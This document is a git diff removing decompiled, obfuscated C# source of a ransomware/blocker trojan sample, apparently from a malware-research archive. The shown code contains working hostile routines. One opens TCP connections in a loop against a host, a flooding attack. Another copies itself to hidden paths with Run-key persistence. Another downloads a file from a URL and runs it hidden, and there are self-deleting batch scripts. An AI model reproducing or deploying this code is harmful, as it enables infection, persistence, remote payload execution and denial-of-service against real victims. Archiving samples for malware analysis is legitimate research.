<Compile Include="cee7cc3756d4f6d8913411c92b2e1cc36.cs" />
<Compile Include="c2b32128b27710d76674c1117f7f19ccf.cs" />
<Compile Include="c6483995e04301d945fdc8bbbeb2fdfcb.cs" />
<Compile Include="c9988649815b3bee89b89ce1f70add59a.cs" />
<Compile Include="c3037471a929a2c4f79d69973718345fa.cs" />
<Compile Include="cb7379333abfa1ab1cb35304f3a8573ec.cs" />
<Compile Include="c9b81b1a3e4ee51d08f5de2448e459036.cs" />
<Compile Include="c3f3e07dcb3874c5b417537b713b608b7.cs" />
<Compile Include="c7bada025401008fe87db7163fb8faf48.cs" />
<Compile Include="Token2000021.cs" />
<Compile Include="Stub\cRARSpread.cs" />
<Compile Include="Stub\Token2000022.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Sharl" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Trojan-Ransom.Win32.Blocker.hejd.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharl", "Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.csproj", "{64176F0A-1972-439B-930A-31A081E500B5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{64176F0A-1972-439B-930A-31A081E500B5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

12
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/_003CModule_003E.cs
View File

@ -1,12 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using A;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => cb7b65dbb5581eaee2bd1292ca8df7359.ced5cd5d8a5c50a5a5aa8329c9369c6b7();
}

125
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c1f9af90f19d5acdd4845049bcd9444a8.cs
View File

@ -1,125 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c1f9af90f19d5acdd4845049bcd9444a8
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections;
using System.IO;
using System.Reflection;
namespace A
{
internal class c1f9af90f19d5acdd4845049bcd9444a8
{
private static readonly Hashtable c7e4f9fe198eee3a882008833d9159fcd = new Hashtable();
private static readonly Hashtable c117122acd19861812518cbadde59037e = new Hashtable();
internal static void cfe055d7d0b39490089d150a4a9443779()
{
char[] charArray = "".ToCharArray();
for (int index = 0; index < charArray.Length; ++index)
charArray[index] = (char) ~(ushort) charArray[index];
string[] strArray = new string(charArray).Split(new string[1]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2509)
}, StringSplitOptions.RemoveEmptyEntries);
if (strArray != null && strArray.Length >= 0)
{
for (int index = 0; index < strArray.Length; index += 2)
{
if (strArray[index + 1].StartsWith(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2514)))
{
try
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string path = Path.Combine(Path.GetDirectoryName(executingAssembly.Location), strArray[index]);
if (!File.Exists(path))
{
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName == strArray[index + 1])
{
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
byte[] buffer = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(manifestResourceStream);
using (FileStream fileStream = new FileStream(path, FileMode.Create, FileAccess.Write))
fileStream.Write(buffer, 0, buffer.Length);
manifestResourceStream.Close();
}
}
}
}
catch
{
}
}
else
c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e[(object) strArray[index]] = (object) strArray[index + 1];
}
}
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(c1f9af90f19d5acdd4845049bcd9444a8.c990de96805170250d1fdfc1d6c753706);
}
private static Assembly c990de96805170250d1fdfc1d6c753706(
object c5669828436342a69e25de42ecd6cb771,
ResolveEventArgs c01306e5de7acf5afd10f9b0df1fe65dd)
{
string name = c01306e5de7acf5afd10f9b0df1fe65dd.Name;
string empty = string.Empty;
foreach (string key in (IEnumerable) c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e.Keys)
{
if (key.StartsWith(name))
{
Assembly assembly = c1f9af90f19d5acdd4845049bcd9444a8.c7e4f9fe198eee3a882008833d9159fcd[(object) key] as Assembly;
if ((object) assembly != null)
return assembly;
empty = c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e[(object) key] as string;
break;
}
}
if (empty.Length == 0)
return (Assembly) null;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
foreach (string manifestResourceName1 in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName1 == empty)
{
byte[] rawAssembly = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(manifestResourceName1));
byte[] rawSymbolStore = (byte[]) null;
try
{
string str = empty + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2517);
foreach (string manifestResourceName2 in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName2 == str)
rawSymbolStore = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(manifestResourceName2));
}
}
catch (Exception ex)
{
}
Assembly assembly;
if (rawSymbolStore == null)
{
assembly = Assembly.Load(rawAssembly);
}
else
{
try
{
assembly = Assembly.Load(rawAssembly, rawSymbolStore);
}
catch (Exception ex)
{
assembly = Assembly.Load(rawAssembly);
}
}
c1f9af90f19d5acdd4845049bcd9444a8.c7e4f9fe198eee3a882008833d9159fcd[(object) name] = (object) assembly;
return assembly;
}
}
return (Assembly) null;
}
}
}

45
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c25810691943c3772c89bee5b3c190ee0.cs
View File

@ -1,45 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c25810691943c3772c89bee5b3c190ee0
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Reflection;
using System.Text;
namespace A
{
internal class c25810691943c3772c89bee5b3c190ee0
{
internal static readonly byte[] c5e9a3dbd2a1aab07443c36ff76e6fcef;
static c25810691943c3772c89bee5b3c190ee0()
{
if (c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef != null)
return;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(executingAssembly.GetName().Name + executingAssembly.GetName().Name));
}
internal static string c67f77785e5df280621394f94fff2ffdf(int cb118298f356e23d856766cd5c0861a45)
{
int count;
if (((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & 128) == 0)
{
count = (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45];
++cb118298f356e23d856766cd5c0861a45;
}
else if (((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & 64) == 0)
{
count = ((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & -129) << 8 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 1];
cb118298f356e23d856766cd5c0861a45 += 2;
}
else
{
count = ((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & -193) << 24 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 1] << 16 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 2] << 8 | (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45 + 3];
cb118298f356e23d856766cd5c0861a45 += 4;
}
return count < 1 ? string.Empty : string.Intern(Encoding.Unicode.GetString(c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef, cb118298f356e23d856766cd5c0861a45, count));
}
}
}

125
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c2b32128b27710d76674c1117f7f19ccf.cs
View File

@ -1,125 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c2b32128b27710d76674c1117f7f19ccf
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;
namespace A
{
internal class c2b32128b27710d76674c1117f7f19ccf
{
private static ThreadStart[] c1aa5e7f9240b5cc21ac78813ddfbaa39;
private static Thread[] c12e108ff6c83dbee08305cc2b0ce9998;
public static string c966ab90271ad8729ab4aa4181c310abf;
private static IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
public static ushort cf7dbbb0d9526e45865da4ee3fb9e1488;
private static c2b32128b27710d76674c1117f7f19ccf.c4266534a0e42882f2383a9b38c981148[] c0b642d31ab826f70f3bf7cc60c70e048;
public static int c52cb3c9fa9ea96db544af1bec7b932c8;
public static int c1e5fb6eadf8fa36fbb78b515080241e1;
public static void c68372a86611194582de7bf4f45c72f47()
{
try
{
c2b32128b27710d76674c1117f7f19ccf.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(Dns.GetHostEntry(c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf).AddressList[0], (int) c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
catch
{
c2b32128b27710d76674c1117f7f19ccf.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(IPAddress.Parse(c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf), (int) c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998 = new Thread[c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1];
c2b32128b27710d76674c1117f7f19ccf.c1aa5e7f9240b5cc21ac78813ddfbaa39 = new ThreadStart[c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1];
c2b32128b27710d76674c1117f7f19ccf.c0b642d31ab826f70f3bf7cc60c70e048 = new c2b32128b27710d76674c1117f7f19ccf.c4266534a0e42882f2383a9b38c981148[c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1];
for (int index = 0; index < c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
c2b32128b27710d76674c1117f7f19ccf.c0b642d31ab826f70f3bf7cc60c70e048[index] = new c2b32128b27710d76674c1117f7f19ccf.c4266534a0e42882f2383a9b38c981148(c2b32128b27710d76674c1117f7f19ccf.cdd98f4a39e676344f91b06e9be54701b, c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8);
c2b32128b27710d76674c1117f7f19ccf.c1aa5e7f9240b5cc21ac78813ddfbaa39[index] = new ThreadStart(c2b32128b27710d76674c1117f7f19ccf.c0b642d31ab826f70f3bf7cc60c70e048[index].c254d67f0f5a5ab80dbe5de1d1b27a54e);
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998[index] = new Thread(c2b32128b27710d76674c1117f7f19ccf.c1aa5e7f9240b5cc21ac78813ddfbaa39[index]);
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998[index].Start();
}
}
public static void c90f6d098ad5ce70814005fb0adf72870()
{
for (int index = 0; index < c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
try
{
c2b32128b27710d76674c1117f7f19ccf.c12e108ff6c83dbee08305cc2b0ce9998[index].Suspend();
}
catch
{
}
}
}
private class c4266534a0e42882f2383a9b38c981148
{
private IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
private Socket[] cd5ac2690507af44059caeb0c8b2a71f7;
private int c52cb3c9fa9ea96db544af1bec7b932c8;
public c4266534a0e42882f2383a9b38c981148(
IPEndPoint c8293ed1972789902aa5c44e762d830c9,
int c6119b42523906b6f13307cecbf8b1413)
{
this.cdd98f4a39e676344f91b06e9be54701b = c8293ed1972789902aa5c44e762d830c9;
this.c52cb3c9fa9ea96db544af1bec7b932c8 = c6119b42523906b6f13307cecbf8b1413;
}
private void c22ceca82e2535e14a0cc7fd164eea8bb(IAsyncResult c3174ece3cd2dcd4435a3a66491c498e6)
{
}
public void c254d67f0f5a5ab80dbe5de1d1b27a54e()
{
label_1:
try
{
while (true)
{
this.cd5ac2690507af44059caeb0c8b2a71f7 = new Socket[this.c52cb3c9fa9ea96db544af1bec7b932c8];
for (int index = 0; index < this.c52cb3c9fa9ea96db544af1bec7b932c8; ++index)
{
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = new Socket(this.cdd98f4a39e676344f91b06e9be54701b.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Blocking = false;
AsyncCallback callback = new AsyncCallback(this.c22ceca82e2535e14a0cc7fd164eea8bb);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].BeginConnect((EndPoint) this.cdd98f4a39e676344f91b06e9be54701b, callback, (object) this.cd5ac2690507af44059caeb0c8b2a71f7[index]);
}
Thread.Sleep(100);
for (int index = 0; index < this.c52cb3c9fa9ea96db544af1bec7b932c8; ++index)
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
this.cd5ac2690507af44059caeb0c8b2a71f7 = (Socket[]) null;
}
}
catch
{
for (int index = 0; index < this.c52cb3c9fa9ea96db544af1bec7b932c8; ++index)
{
try
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
catch
{
}
}
goto label_1;
}
}
}
}
}

70
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c3037471a929a2c4f79d69973718345fa.cs
View File

@ -1,70 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c3037471a929a2c4f79d69973718345fa
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Microsoft.Win32;
using System;
using System.Management;
namespace A
{
internal class c3037471a929a2c4f79d69973718345fa
{
public string c738d27e0c9d7bf012cc5f99d4e1976d7() => this.cb6dcfcc6a5b19bdf121f6143ff6d7f33() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + this.ca7e5f7d544fbc3dcaf17e61fbab6e3dd();
public string c72aa46ec5ece51f7696deeb664e545ce()
{
string c45a1644c18560d9d988c8c135941ea96 = (this.c8399c5c4fcb71c18f3f458b674bb41c5() + this.ca6a4dd6f6e974a349cf2f38f0541f742() + this.c006e22094a7a882c42eb57a97d75a841()).ToString();
return c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c31239248ceba059cc32e70ac96898ec2(c45a1644c18560d9d988c8c135941ea96);
}
private string cb6dcfcc6a5b19bdf121f6143ff6d7f33()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(803));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(876)]);
try
{
string str = empty.Split('|')[0];
int length = str.Split(' ')[0].Length;
return str.Substring(length).TrimStart().TrimEnd();
}
catch
{
return c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(885);
}
}
private string ca7e5f7d544fbc3dcaf17e61fbab6e3dd() => Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(914)).GetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1007)).ToString().Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1028)) ? c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1035) : c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1052);
private string c8399c5c4fcb71c18f3f458b674bb41c5()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1069));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1176)]);
return empty;
}
private string c006e22094a7a882c42eb57a97d75a841()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1199));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1258)]);
return empty;
}
public string ca6a4dd6f6e974a349cf2f38f0541f742()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(782), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1283));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1354)]);
return empty;
}
}
}

196
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c3f3e07dcb3874c5b417537b713b608b7.cs
View File

@ -1,196 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c3f3e07dcb3874c5b417537b713b608b7
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace A
{
internal class c3f3e07dcb3874c5b417537b713b608b7
{
private Mutex c96cf8adc07121b9089c8779f8a06475a;
public void c366d1ab19bbdf3ebcee35b30020550b1()
{
this.cc286121f05a5cd6b2f553091501ad86b();
this.c44a8775ef705aea893c2464d5dc35368();
this.c3a314ec321315e78451e3a3160d4e530();
}
private void cc286121f05a5cd6b2f553091501ad86b()
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a = new Mutex(true, c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c053a2ccab85d88a8bb0dd1fb41fedf35);
this.c96cf8adc07121b9089c8779f8a06475a.ReleaseMutex();
}
catch
{
Environment.Exit(-1);
}
}
private void c3a314ec321315e78451e3a3160d4e530()
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
if (this.c26b99a61e58734baa67d710bbfd72df9())
return;
try
{
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
{
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(str))
System.IO.File.Copy(fileName, str);
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
}
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[0] + (object) '"'));
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[1] + (object) '"'));
}
catch
{
}
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
new Process()
{
StartInfo = {
FileName = str,
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
Environment.Exit(-1);
}
public void c32ad199a1a1b21b2f3794ba8b7927c6b(string cf6d6107114ce95c52d91a8d33c162461)
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
}
catch
{
}
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(cf6d6107114ce95c52d91a8d33c162461, Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
public void ceaf8f38b42d6fe6312cc350ddb4ba0d6()
{
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0]);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1]);
}
catch
{
}
try
{
foreach (string path in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
System.IO.File.Delete(path);
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
private bool c26b99a61e58734baa67d710bbfd72df9()
{
string[] c712648a24a265f1e1bc00c1dfbecbd3e = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e;
int index = 0;
if (index < c712648a24a265f1e1bc00c1dfbecbd3e.Length)
{
string c8ce60bab4df112e38d93bdc39407e331 = c712648a24a265f1e1bc00c1dfbecbd3e[index];
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(c8ce60bab4df112e38d93bdc39407e331))
return false;
}
return true;
}
private void c514ba733b87988f147798195875c1771()
{
try
{
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1796) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1813) + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1834);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
private void c44a8775ef705aea893c2464d5dc35368()
{
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1993), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2006), RegistryValueKind.DWord);
}
catch
{
}
